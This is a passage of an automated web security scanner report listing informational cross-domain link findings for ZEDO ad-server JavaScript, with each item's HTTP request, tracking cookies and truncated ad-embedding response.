...[SNIP]...

23.204. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.040506900901723764 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=33:32:32:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=33:33:32:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=70
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:11 GMT
Connection: close
Content-Length: 2714

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=934861%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=33%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=33%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.205. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.23843470946561412 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=12:12:13:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:59 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=14:12:12:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=143
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:47:59 GMT
Connection: close
Content-Length: 2643

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<IFRAME SRC="http://ad.doubleclick.net/adi/N5767.dogtimemedia.comOX6462/B5108358.3;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=909002%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=14%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=14%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>');
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5767.dogtimemedia.comOX6462/B5108358.3;abr=!ie;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=909002%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=14%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=14%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.206. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.3272915337496304 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=8:6:5:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175|2,1,1:1,1,1:1,1,1:0,1,1:1,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175|2,1,1:1,1,1:1,1,1:0,1,1:1,1,1:2,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:21 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=6:8:6:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=180
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:47:22 GMT
Connection: close
Content-Length: 2668

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587468/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931215%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=6%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=6%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.207. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.32167528868912826 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=44:43:47:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=45:43:47:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=115
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:49:59 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=45%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=45%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.208. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.059319593837745765 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,3:809,1050,7:809,1050,21; FFgeo=2241452; FFad=38:40:37:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=39:40:37:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,3:809,1050,7:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=41
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:40 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=39%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=39%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.209. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.6539107557884478 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=47:46:51:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=48:46:51:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=107
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:07 GMT
Connection: close
Content-Length: 2694

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587468/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=935452%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=48%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=48%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.210. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.04234137504326618 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=53:64:54:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=55:53:64:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=156
Expires: Sun, 24 Apr 2011 16:53:38 GMT
Date: Sun, 24 Apr 2011 16:51:02 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=55%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=55%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.211. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.8144964468605409 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=2:2:2:None; FFCap=1574B809,210132,210841|1,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841|2,1,1:1,1,1;expires=Tue, 24 May 2011 16:47:02 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=3:2:2:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=200
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:47:02 GMT
Connection: close
Content-Length: 2682

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931213%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=3%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=3%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.212. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.5405973916567646 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=25:24:22:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:3,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:4,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:40 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=23:25:24:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=101
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:40 GMT
Connection: close
Content-Length: 2138

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.8;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903895%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=23%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=23%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.213. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.858274151681732 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=17:17:18:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:1,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:18 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
